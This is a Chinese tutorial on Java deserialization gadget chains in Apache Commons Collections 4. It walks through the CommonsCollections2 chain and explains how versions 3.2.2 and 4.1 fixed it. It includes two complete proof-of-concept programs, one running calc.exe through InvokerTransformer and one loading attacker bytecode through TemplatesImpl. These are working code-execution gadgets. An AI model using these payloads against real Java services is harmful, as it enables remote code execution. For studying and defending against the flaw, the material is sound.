一、前言
Apache Commons Collections 是一个著名的辅助开发库,包含了一些Java中没有的数据结构和辅助方法,不过随着Java 9 以后的版本中原生库功能的丰富,以及反序列化漏洞的影响,它也在逐渐被升级或替代。
在2015年底的commons-collections反序列化利用被提出时,Apache Commons Collections有以下两个分支版本:
- commons-collections:commons-collections
- org.apahce.commons: commonst-collections4
可⻅,groupId和artifactId都变了。前者是Commons Collections⽼的版本包,当时版本号是3.2.1;后 者是官⽅在2013年推出的4版本,当时版本号是4.0。
官⽅认为旧的commons-collections有⼀些架构和API设计上的问题,但修复这些问题,会产⽣⼤量不能 向前兼容的改动。所以,commons-collections4不再认为是⼀个⽤来替换commons-collections的新版 本,⽽是⼀个新的包,两者的命名空间不冲突,因此可以共存在同⼀个项⽬中。 那么很⾃然有个问题,既然3.2.1中存在反序列化利⽤链,那么4.0版本是否存在呢?
二、commons-collections4的改动
因为两者可以共存,可以将两个包安装到同一个项目中比较:
<dependencies><!-- https://mvnrepository.com/artifact/commons-collections/commonscollections --><dependency><groupId>commons-collections</groupId><artifactId>commons-collections</artifactId><version>3.2.1</version></dependency><!-- https://mvnrepository.com/artifact/org.apache.commons/commonscollections4 --><dependency><groupId>org.apache.commons</groupId><artifactId>commons-collections4</artifactId><version>4.0</version></dependency>
</dependencies因为老的Gadget 中依赖的包名都是 org.apache.commons.collections , 而新的包名已经变成 org.apache.commons.collections4。 我们用熟悉的CommonsCollections6 利用链做例子,直接把代码拷贝一遍,并且将所有 import org.apache.commons.collections.* 改成 import org.apache.commmons.collections4.*
此时 IDE 爆出了一个错误,原因是 LazyMap.decorate 这个方法没了:
我们查看下 Commons.collection3中 decorate的定义,代码很简单
public static Map decorate(Map map, Transformer factory) {return new LazyMap(map, factory);}
这个方法不过就是 LazyMap 构造函数的一个包装,而在 commons.collection4 中这是改了个名字叫 lazyMap:
public static <K, V> LazyMap<K, V> lazyMap(Map<K, V> map, Factory<? extends V> factory) {return new LazyMap(map, factory);}所以我们将Gadget中出错的代码换一下名字:
Map outerMap = LazyMap.lazyMap(innerMap, transformerChain);解决了错误,成功执行代码
同理,之前的 CC1、CC3利用链都可以在 commonscollections4 的包中使用。
三、CommonsCollections2 利用链
commons-collections 这个包之所以能攒出那么多的利用链来,除了因为其使用量大,技术上的原因是其中包含了一些可以执行任意方法的Transformer。 所以,在commons-collections 中找 Gadget的过程,实际上可以简化为,找一条从 Serialization#read Object() 方法到 Transformer#transform() 方法的调用链。
故而,我们学习下CommonsCollections2 利用链,其用到的关键的两个类如下:
- java.util.PriorityQueue
- org.apache.commons.collections4.comparators.TransformingComparator
java.util.PriorityQueue 是一个有自己 readObject() 方法的类:
org.apache.commons.collections4.comparators.TransformingComparator 中有调用 transform() 方法 的函数,且里面的transformer来自于构造函数的传参:
TransformingComparator.classpublic TransformingComparator(Transformer<? super I, ? extends O> transformer) {this(transformer, ComparatorUtils.NATURAL_COMPARATOR);}public TransformingComparator(Transformer<? super I, ? extends O> transformer, Comparator<O> decorated) {this.decorated = decorated;this.transformer = transformer;}
public int compare(final I obj1, final I obj2) {final O value1 = this.transformer.transform(obj1);final O value2 = this.transformer.transform(obj2);return this.decorated.compare(value1, value2);
}所以,CommonsCollections2 利用链 实际就是一条从 PriorityQueue 到 TransformingComparator 的利用链。
Gadget chain:
- ObjectInputStream.readObject()
- PriorityQueue.readObject()
- PriorityQueue.heapify()
- PriorityQueue.siftDown()
- PriorityQueue.siftDownUsingComparator()
- TransformingComparator.compare()
- InvokerTransformer.transform()
- Method.invoke()
- Runtime.exec()
了解下他们是怎么连接起来的。 PriorityQueue#readObject() 中调用了 heapify() 方法 , heapify() 中调用了 siftDown() , siftDown() 中调用了 siftDownUsingComparator() , siftDownUsingComparator() 中调用的 comparator.compare() ,于是就连接到上面的 TransformingComparator了:
PriorityQueue.classprivate void heapify() {for(int var1 = (this.size >>> 1) - 1; var1 >= 0; --var1) {this.siftDown(var1, this.queue[var1]);}private void siftDown(int var1, E var2) {if (this.comparator != null) {this.siftDownUsingComparator(var1, var2);} else {this.siftDownComparable(var1, var2);}private void siftDownUsingComparator(int var1, E var2) {int var4;for(int var3 = this.size >>> 1; var1 < var3; var1 = var4) {var4 = (var1 << 1) + 1;Object var5 = this.queue[var4];int var6 = var4 + 1;if (var6 < this.size && this.comparator.compare(var5, this.queue[var6]) > 0) {var4 = var6;var5 = this.queue[var6];}if (this.comparator.compare(var2, var5) <= 0) {break;}this.queue[var1] = var5;}this.queue[var1] = var2;}而 this.comparator 和 this.queue来自于 PriorityQueue的构造函数传参中中:
PriorityQueue.class private final Comparator<? super E> comparator;public PriorityQueue(int var1, Comparator<? super E> var2) {this.size = 0;this.modCount = 0;if (var1 < 1) {throw new IllegalArgumentException();} else {this.queue = new Object[var1];this.comparator = var2;}}总结一下:
- java.util.PriorityQueue 是一个优先队列(Queue) ,基于二叉堆实现,队列中每一个元素有自己的优先级,节点之间按照优先级大小排序成一棵树
- 反序列化时为什么需要调用 heapify() 的方法? 为了反序列化后,需要恢复这个结构的顺序
- 排序是将靠大的元素下移实现的。siftDown() 是将节点下移的函数, 而 comparator.compare() 用来比较元素的大小
- TransformingComparator 实现了 java.util.Comparator 接口, 这个接口用于定义两个对象如何进行比较。 siftDownUsingComparator() 中就是使用这个接口的compare() 方法比较树的节点
关于 PriorityQueue 这个数据结构的具体原理,可以参考这篇⽂章:PriorityQueue源码分析 - linghu_java - 博客园
开始编写POC,⾸先,还是创建Transformer:
Transformer[] fakeTransformers = new Transformer[] { new ConstantTransformer(1) };
Transformer[] transformers = new Transformer[]{new ConstantTrransformer(Runtime.class),new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),new InvokerTransformer("exec", new Class[] {String.class}, new String[]{"calc.exe"})};Transformer transformerChain= new ChainedTransformer(fakeTransformers);再创建一个 TransformingComparator ,传入我们的 Transformer:
Comparator comparator = new TransformingComparator(transformerChain); 实例化 PriorityQueue 对象,第⼀个参数是初始化时的⼤⼩,⾄少需要 2 个元素才会触发排序和⽐较, 所以是2 ;第⼆个参数是⽐较时的 Comparator ,传⼊前⾯实例化的 comparator
PriorityQueue queue = new PriorityQueue(2, comparator);
queue.add(1);
queue.add(2); 后⾯随便添加了 2 个数字进去,这⾥可以传⼊⾮ null 的任意对象,因为我们的 Transformer 是忽略传⼊参数的。
最后,将真正的恶意 Transformer 设置上
setFieldValue(transformerChain, "iTransformers", transformers);完整的POC如下:
运行环境:
java 1.8.0_71commons-collections4.0
CommonsCollections2.javapackage com.govuln.shiroattack;import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Comparator;
import java.util.PriorityQueue;public class CommonsCollections2 {public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception{Field field = obj.getClass().getDeclaredField(fieldName);field.setAccessible(true);field.set(obj, value);}public static void main(String[] args) throws Exception {Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};Transformer[] transformers = new Transformer[]{new ConstantTransformer(Runtime.class),new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0] }),new InvokerTransformer("exec", new Class[]{String.class}, new String[]{"calc.exe"}),};Transformer transformerChain = new ChainedTransformer(fakeTransformers);Comparator comparator = new TransformingComparator(transformerChain);PriorityQueue queue = new PriorityQueue(2, comparator);queue.add(1);queue.add(2);setFieldValue(transformerChain, "iTransformers", transformers);ByteArrayOutputStream barr = new ByteArrayOutputStream();ObjectOutputStream oos = new ObjectOutputStream(barr);oos.writeObject(queue);oos.close();System.out.println(barr);ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));Object o = (Object) ois.readObject();}
}
四、使用无Transformer数组改进 CommonsCollections2利用链
前文说过利用 TemplatesImpl 可以构造出无 Transformer数组 的利用链,这里将CC2这条链也改进下。
首先,还是创建一个 TemplatesImpl对象:
Templates obj = new TemplatesImpl();setFieldValue(obj, "_bytecodes", new byte[][]{getBytescode()});setFieldValue(obj,"_name", "Hello");setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); 创建⼀个⼈畜⽆害的 InvokerTransformer 对象,并⽤它实例化 Comparator :
Transformer transformer = new InvokerTransformer("toString", null, null);Comparator comparator = new TransformingComparator(transformer); 实例化 PriorityQueue ,但是此时向队列⾥添加的元素就是我们前⾯创建的 TemplatesImpl 对象了:
PriorityQueue queue = new PriorityQueue(2, comparator);queue.add(obj);queue.add(obj); 因为我们这⾥⽆法再使⽤ Transformer 数组,所以也就不能 ⽤ ConstantTransformer 来初始化变量,需要接受外部传⼊的变量。⽽在 Comparator#compare() 时,队列⾥的元素将作为参数传⼊ transform() ⽅法,这就是传给 TemplatesImpl#newTransformer 的参数
最后⼀步,将 toString ⽅法改成恶意⽅法 newTransformer :
setFieldValue(transformer, "iMethodName", "newTransformer");完整的poc如下:
运行环境:
java 1.8.0_71commons-collections4.0
templatesForCommonsCollections2.javapackage com.govuln.shiroattack;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;import javax.xml.transform.Templates;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Comparator;
import java.util.PriorityQueue;public class templatesForCommonsCollections2 {public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {Field field = obj.getClass().getDeclaredField(fieldName);field.setAccessible(true);field.set(obj, value);}protected static byte[] getBytescode() throws Exception {ClassPool pool = ClassPool.getDefault();CtClass clazz = pool.get(Evil.class.getName());return clazz.toBytecode();}public static void main(String[] args) throws Exception{Templates obj = new TemplatesImpl();setFieldValue(obj, "_bytecodes", new byte[][]{getBytescode()});setFieldValue(obj,"_name", "Hello");setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());Transformer transformer = new InvokerTransformer("toString", null, null);Comparator comparator = new TransformingComparator(transformer);PriorityQueue queue = new PriorityQueue(2, comparator);queue.add(obj);queue.add(obj);setFieldValue(transformer, "iMethodName", "newTransformer");ByteArrayOutputStream barr = new ByteArrayOutputStream();ObjectOutputStream oos = new ObjectOutputStream(barr);oos.writeObject(queue);oos.close();System.out.println(barr);ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));Object o = (Object)ois.readObject();}
}
五、修复说明
1、PriorityQueue的利⽤链是否⽀持在commons-collections 3中使⽤?
不能,因为利用链的关键类 org.apache.commons.collections4.comparators.TransformingComparator,在 commons-collections4.0 以前没有实现 Serializable接口,无法在序列化中使用
2、Apache Commons Collections 官方是如何修复反序列化漏洞的?
Apache Commons Collections 官⽅在 2015 年底得知序列化相关的问题后,就在两个分⽀
上同时发布了新的版本, 4.1 和 3.2.2 。
先看 3.2.2 ,通过 diff 可以发现,新版代码中增加了⼀个⽅法
FunctorUtils#checkUnsafeSerialization ,⽤于检测反序列化是否安全。如果开发者没有设置全
局配置 org.apache.commons.collections.enableUnsafeSerialization=true ,即默认情况下会
抛出异常。
这个检查在常⻅的危险 Transformer 类
( InstantiateTransformer 、 InvokerTransformer 、 PrototypeFactory 、 CloneTransforme
r 等)的 readObject ⾥进⾏调⽤,所以,当我们反序列化包含这些对象时就会抛出⼀个异常:
再看 4.1 ,修复⽅式⼜不⼀样。 4.1 ⾥,这⼏个危险 Transformer 类不再实现 Serializable 接⼝,也就
是说,他们⼏个彻底⽆法序列化和反序列化了。
